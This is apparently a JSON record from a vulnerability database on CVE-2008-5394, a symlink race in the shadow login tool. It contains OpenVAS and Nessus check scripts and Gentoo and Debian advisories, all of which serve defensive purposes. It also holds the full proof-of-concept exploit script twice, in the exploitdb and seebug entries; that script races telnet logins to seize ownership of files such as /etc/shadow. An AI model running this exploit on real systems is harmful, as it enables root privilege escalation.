in\nadvisory GLSA 200903-24.", "modified": "2018-04-06T00:00:00", "published": "2009-03-13T00:00:00", "id": "OPENVAS:136141256231063555", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063555", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-24 (shadow)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"An insecure temporary file usage in Shadow may allow local users to gain\nroot privileges.\";\ntag_solution = \"All Shadow users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-apps/shadow-4.1.2.2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-24\nhttp://bugs.gentoo.org/show_bug.cgi?id=251320\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-24.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63555\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-24 (shadow)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"sys-apps/shadow\", unaffected: make_list(\"ge 4.1.2.2\"), vulnerable: make_list(\"lt 4.1.2.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-24.", "modified": "2017-07-07T00:00:00", "published": "2009-03-13T00:00:00", "id": "OPENVAS:63555", "href": "http://plugins.openvas.org/nasl.php?oid=63555", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-24 (shadow)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"An insecure temporary file usage in Shadow may allow local users to gain\nroot privileges.\";\ntag_solution = \"All Shadow users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-apps/shadow-4.1.2.2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-24\nhttp://bugs.gentoo.org/show_bug.cgi?id=251320\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-24.\";\n\n \n \n\nif(description)\n{\n script_id(63555);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-24 (shadow)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"sys-apps/shadow\", unaffected: make_list(\"ge 4.1.2.2\"), vulnerable: make_list(\"lt 4.1.2.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-695-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840229", "href": "http://plugins.openvas.org/nasl.php?oid=840229", "type": "openvas", "title": "Ubuntu Update for shadow vulnerability USN-695-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_695_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for shadow vulnerability USN-695-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Szabo discovered a race condition in login. While setting up\n tty permissions, login did not correctly handle symlinks. If a local\n attacker were able to gain control of the system utmp file, they could\n cause login to change the ownership and permissions on arbitrary files,\n leading to a root privilege escalation.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-695-1\";\ntag_affected = \"shadow vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 7.10 ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-695-1/\");\n script_id(840229);\n script_cve_id(\"CVE-2008-5394\");\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"695-1\");\n script_name( \"Ubuntu Update for shadow vulnerability USN-695-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"login\", ver:\"4.0.13-7ubuntu3.4\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.0.13-7ubuntu3.4\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"login\", ver:\"4.1.1-1ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.1.1-1ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"login\", ver:\"4.0.18.2-1ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.0.18.2-1ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"login\", ver:\"4.0.18.1-9ubuntu0.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.0.18.1-9ubuntu0.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:01", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5394"], "description": "### Background\n\nShadow is a set of tools to deal with user accounts. \n\n### Description\n\nPaul Szabo reported a race condition in the \"login\" executable when setting up tty permissions. \n\n### Impact\n\nA local attacker belonging to the \"utmp\" group could use symlink attacks to overwrite arbitrary files and possibly gain root privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Shadow users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-apps/shadow-4.1.2.2\"", "edition": 1, "modified": "2009-03-10T00:00:00", "published": "2009-03-10T00:00:00", "id": "GLSA-200903-24", "href": "https://security.gentoo.org/glsa/200903-24", "type": "gentoo", "title": "Shadow: Privilege escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T01:55:57", "description": "Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC. CVE-2008-5394. Local exploit for linux platform", "published": "2008-12-01T00:00:00", "type": "exploitdb", "title": "Debian GNU/Linux symlink attack in login Arbitrary File Ownership PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5394"], "modified": "2008-12-01T00:00:00", "id": "EDB-ID:7313", "href": "https://www.exploit-db.com/exploits/7313/", "sourceData": "#!/bin/bash -\n\necho '\n\t#include <string.h>\n\t#include <stdlib.h>\n\t#include <unistd.h>\n\t#include <utmp.h>\n\t#include <sys/types.h>\n\t#include <stdio.h>\n\n\tint main(int argc, char *argv[])\n\t{\n\t struct utmp entry;\n\t int i;\n\n\t entry.ut_type=LOGIN_PROCESS;\n\t strcpy(entry.ut_line,\"/tmp/x\");\n\t entry.ut_time=0;\n\t strcpy(entry.ut_user,\"badguy\");\n\t strcpy(entry.ut_host,\"badhost\");\n\t entry.ut_addr=0;\n\t for(i=1;i<9;i++) {\n\t entry.ut_pid=(pid_t)( i + (int)getpid() );\n\t sprintf(entry.ut_id,\"bad%d\",i);\n\t pututline(&entry);\n\t }\n\t}\n' > /tmp/fillutmp.c\n\ncc -o /tmp/fillutmp /tmp/fillutmp.c\n\necho 'Ask someone with group utmp privileges to do:'\necho ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'\necho -n 'Press [RETURN] to continue... '\nread ANS\n\necho '\n\t#include <unistd.h>\n\n\tint main(int argc, char *argv[])\n\t{\n\t while(1)\n\t {\n\t unlink(\"/tmp/x\");\n\t symlink(argv[1],\"/tmp/x\");\n\t unlink(\"/tmp/x\");\n\t symlink(argv[2],\"/tmp/x\");\n\t }\n\t}\n' > /tmp/jigglelnk.c\n\ncc -o /tmp/jigglelnk /tmp/jigglelnk.c\n\nHOST=`hostname` # or simply localhost?\necho \"Which tty do you think a 'telnet $HOST' will use next?\"\necho \"(Do that telnet and see...)\"\nread TTY\necho \"You said it will be '$TTY' ...\"\n\nATK=/etc/debian_version # should be /etc/shadow\n\necho \"Starting symlink re-jiggler ...\"\n/tmp/jigglelnk $TTY $ATK &\nJIG=$!\n\nLOOP=0\nwhile :; do\n ((LOOP = $LOOP + 1))\n echo; echo; echo \"Try = $LOOP\"\n\n /tmp/fillutmp\n\n echo \"Telnetting... if login succeeds, just exit for next try...\"\n /usr/bin/telnet $HOST\n\n LS=`ls -ld $ATK`\n case \"$LS\" in\n *root*root* ) ;; # not done yet...\n * )\n echo; echo\n echo \"Success after $LOOP tries!\"\n echo \"$LS\"\n echo; echo\n break\n ;;\n esac\ndone\n\nkill $JIG\nrm /tmp/fillutmp /tmp/jigglelnk /tmp/x\n\n# ...\n# ~$ logout\n# Connection closed by foreign host.\n# Success after 12 tries!\n# -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version\n\n# milw0rm.com [2008-12-01]\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7313/"}], "debian": [{"lastseen": "2020-11-11T13:18:34", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5394"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1709-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJanuary 21, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : shadow\nVulnerability : race condition\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-5394\nDebian Bug : 505271\n\nPaul Szabo discovered that login, the system login tool, did not\ncorrectly handle symlinks while setting up tty permissions. If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary files,\nleading to a root privilege escalation.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 4.0.18.1-7+etch1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.1.1-6.\n\nWe recommend that you upgrade your shadow package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1.orig.tar.gz\n Size/MD5 checksum: 2354234 3f54eaa3a35e7c559f4def92e9957581\n http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1-7+etch1.diff.gz\n Size/MD5 checksum: 297817 b78d9d738765da65a6b55dea102569c3\n http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1-7+etch1.dsc\n Size/MD5 checksum: 1406 ec01ac54e482ea552fdae5753d6c1745\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_alpha.deb\n Size/MD5 checksum: 810680 329e1cd5ad019d3984411b1a8a5c77ad\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_alpha.deb\n Size/MD5 checksum: 943992 76690a44c565b4594892bab69eaf7e30\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_amd64.deb\n Size/MD5 checksum: 867696 4ce4e2f7884cd883729123163930b9dc\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_amd64.deb\n Size/MD5 checksum: 806412 3a6171d83a4b79846fe4831b02007a4b\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_arm.deb\n Size/MD5 checksum: 778766 df6126b8cd29de54831976a24d28589e\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_arm.deb\n Size/MD5 checksum: 791770 a9e7b122a8f9a7944bfc91b7cec77554\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_hppa.deb\n Size/MD5 checksum: 847846 8562b322610062eb31689e467d80ff7c\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_hppa.deb\n Size/MD5 checksum: 804082 af4a3f06a93be5cea7dd7dfeed8eed1b\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_i386.deb\n Size/MD5 checksum: 792460 82c630b2f4e18217170a73a2dab27cba\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_i386.deb\n Size/MD5 checksum: 796578 439cd50477db064cdf11d9b48c0e9af0\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_ia64.deb\n Size/MD5 checksum: 1048736 79434b796109c1565f0f0be3cb8d06f0\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_ia64.deb\n Size/MD5 checksum: 826456 13df2a0a071f407c84b25ae3ed6077bc\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_mips.deb\n Size/MD5 checksum: 804530 0523d4220e9cb7e8b2342a0a33c1e989\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_mips.deb\n Size/MD5 checksum: 899612 597b58ea81e074bae374b412f28e1252\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_mipsel.deb\n Size/MD5 checksum: 908860 ade3427a1b8b693a098544ac27ae17aa\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_mipsel.deb\n Size/MD5 checksum: 805100 fd9d9e49cd9b7864b06865c097f0ba08\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_powerpc.deb\n Size/MD5 checksum: 805442 c8f8683c70aabfbea99f27115afda81e\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_powerpc.deb\n Size/MD5 checksum: 856164 16db8928aa4424f57372e32b23b7de58\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_s390.deb\n Size/MD5 checksum: 820700 2cd319907d34afe08918cd5f93461f60\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_s390.deb\n Size/MD5 checksum: 804200 4851f0e0fa27d5786353b6235316215a\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_sparc.deb\n Size/MD5 checksum: 800196 19f9b82843f53040d2083e348d0300d4\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_sparc.deb\n Size/MD5 checksum: 789552 ae637bec3b696937705a094db261e973\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 7, "modified": "2009-01-21T10:03:50", "published": "2009-01-21T10:03:50", "id": "DEBIAN:DSA-1709-1:DE4E6", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00016.html", "title": "[SECURITY] [DSA 1709-1] New shadow packages fix privilege escalation", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T19:03:55", "description": "BUGTRAQ ID: 32552\r\nCVE(CAN) ID: CVE-2008-5394\r\n\r\nDebian\u662f\u4e00\u4e2a\u6d41\u884c\u7684Linux\u53d1\u884c\u7248\u672c\u3002\r\n\r\nDebian\u53ca\u5176\u4ed6\u4e00\u4e9bLinux\u7248\u672c\u7684login\u8f6f\u4ef6\u5305\u6ca1\u6709\u5b89\u88c5\u7684\u521b\u5efa\u4e34\u65f6\u6587\u4ef6\u3002utmp\u7ec4\u4e2d\u7684\u672c\u5730\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u521b\u5efa\u4ece\u4e34\u65f6\u6587\u4ef6\u5230\u7cfb\u7edf\u4e2d\u5404\u79cd\u6587\u4ef6\u7684\u7b26\u53f7\u94fe\u63a5\u6765\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u4ee5\u63d0\u5347\u7684\u6743\u9650\u8986\u76d6\u7cfb\u7edf\u4e0a\u7684\u4efb\u610f\u6587\u4ef6\u3002\n\nDebian Linux 4.0\r\nDebian Linux 3.1\r\nDebian Linux 3.0\r\nUbuntu Linux 8.10\r\nUbuntu Linux 8.04\r\nUbuntu Linux 7.10\r\nUbuntu Linux 6.06 LTS\n Debian\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://www.debian.org/security/ target=_blank>http://www.debian.org/security/</a>", "published": "2008-12-19T00:00:00", "type": "seebug", "title": "Debian Linux /bin/login\u8f6f\u4ef6\u5305\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5394"], "modified": "2008-12-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4572", "id": "SSV:4572", "sourceData": "\n #!/bin/bash -\r\n\r\necho '\r\n\t#include <string.h>\r\n\t#include <stdlib.h>\r\n\t#include <unistd.h>\r\n\t#include <utmp.h>\r\n\t#include <sys/types.h>\r\n\t#include <stdio.h>\r\n\r\n\tint main(int argc, char *argv[])\r\n\t{\r\n\t struct utmp entry;\r\n\t int i;\r\n\r\n\t entry.ut_type=LOGIN_PROCESS;\r\n\t strcpy(entry.ut_line,"/tmp/x");\r\n\t entry.ut_time=0;\r\n\t strcpy(entry.ut_user,"badguy");\r\n\t strcpy(entry.ut_host,"badhost");\r\n\t entry.ut_addr=0;\r\n\t for(i=1;i<9;i++) {\r\n\t entry.ut_pid=(pid_t)( i + (int)getpid() );\r\n\t sprintf(entry.ut_id,"bad%d",i);\r\n\t pututline(&entry);\r\n\t }\r\n\t}\r\n' > /tmp/fillutmp.c\r\n\r\ncc -o /tmp/fillutmp /tmp/fillutmp.c\r\n\r\necho 'Ask someone with group utmp privileges to do:'\r\necho ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'\r\necho -n 'Press [RETURN] to continue... '\r\nread ANS\r\n\r\necho '\r\n\t#include <unistd.h>\r\n\r\n\tint main(int argc, char *argv[])\r\n\t{\r\n\t while(1)\r\n\t {\r\n\t unlink("/tmp/x");\r\n\t symlink(argv[1],"/tmp/x");\r\n\t unlink("/tmp/x");\r\n\t symlink(argv[2],"/tmp/x");\r\n\t }\r\n\t}\r\n' > /tmp/jigglelnk.c\r\n\r\ncc -o /tmp/jigglelnk /tmp/jigglelnk.c\r\n\r\nHOST=`hostname` # or simply localhost?\r\necho "Which tty do you think a 'telnet $HOST' will use next?"\r\necho "(Do that telnet and see...)"\r\nread TTY\r\necho "You said it will be '$TTY' ..."\r\n\r\nATK=/etc/debian_version # should be /etc/shadow\r\n\r\necho "Starting symlink re-jiggler ..."\r\n/tmp/jigglelnk $TTY $ATK &\r\nJIG=$!\r\n\r\nLOOP=0\r\nwhile :; do\r\n ((LOOP = $LOOP + 1))\r\n echo; echo; echo "Try = $LOOP"\r\n\r\n /tmp/fillutmp\r\n\r\n echo "Telnetting... if login succeeds, just exit for next try..."\r\n /usr/bin/telnet $HOST\r\n\r\n LS=`ls -ld $ATK`\r\n case "$LS" in\r\n *root*root* ) ;; # not done yet...\r\n * )\r\n echo; echo\r\n echo "Success after $LOOP tries!"\r\n echo "$LS"\r\n echo; echo\r\n break\r\n ;;\r\n esac\r\ndone\r\n\r\nkill $JIG\r\nrm /tmp/fillutmp /tmp/jigglelnk /tmp/x\r\n\r\n# ...\r\n# ~$ logout\r\n# Connection closed by foreign host.\r\n# Success after 12 tries!\r\n# -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-4572", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-06T09:45:16", "description": "Paul Szabo discovered that login, the system login tool, did not\ncorrectly handle symlinks while setting up tty permissions. If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary\nfiles, leading to a root privilege escalation.", "edition": 25, "published": "2009-01-21T00:00:00", "title": "Debian DSA-1709-1 : shadow - race condition", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "modified": "2009-01-21T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:shadow"], "id": "DEBIAN_DSA-1709.NASL", "href": "https://www.tenable.com/plugins/nessus/35431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1709. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35431);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-5394\");\n script_xref(name:\"DSA\", value:\"1709\");\n\n script_name(english:\"Debian DSA-1709-1 : shadow - race condition\");\n script_summary(english:\"Checks dpkg output for the updated 